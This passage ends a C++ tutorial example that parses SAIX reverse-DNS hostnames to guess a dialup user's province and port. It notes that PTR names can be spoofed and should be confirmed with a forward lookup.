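        "blm53-01-23.fs.saix.net", "ndf53-01.gt.saix.net.attacker.example" };
    for (const char* s : samples)
        std::cout << s << " -> " << provinceOf(s) << " (" << dialupPort(s) << ")\n";
    return 0;
}
```

A PTR record is set by whoever controls the reverse zone for that address block, so a name matching this pattern is only a hint about the exchange a dialup user came in through; confirm it with a forward lookup of the name before acting on it.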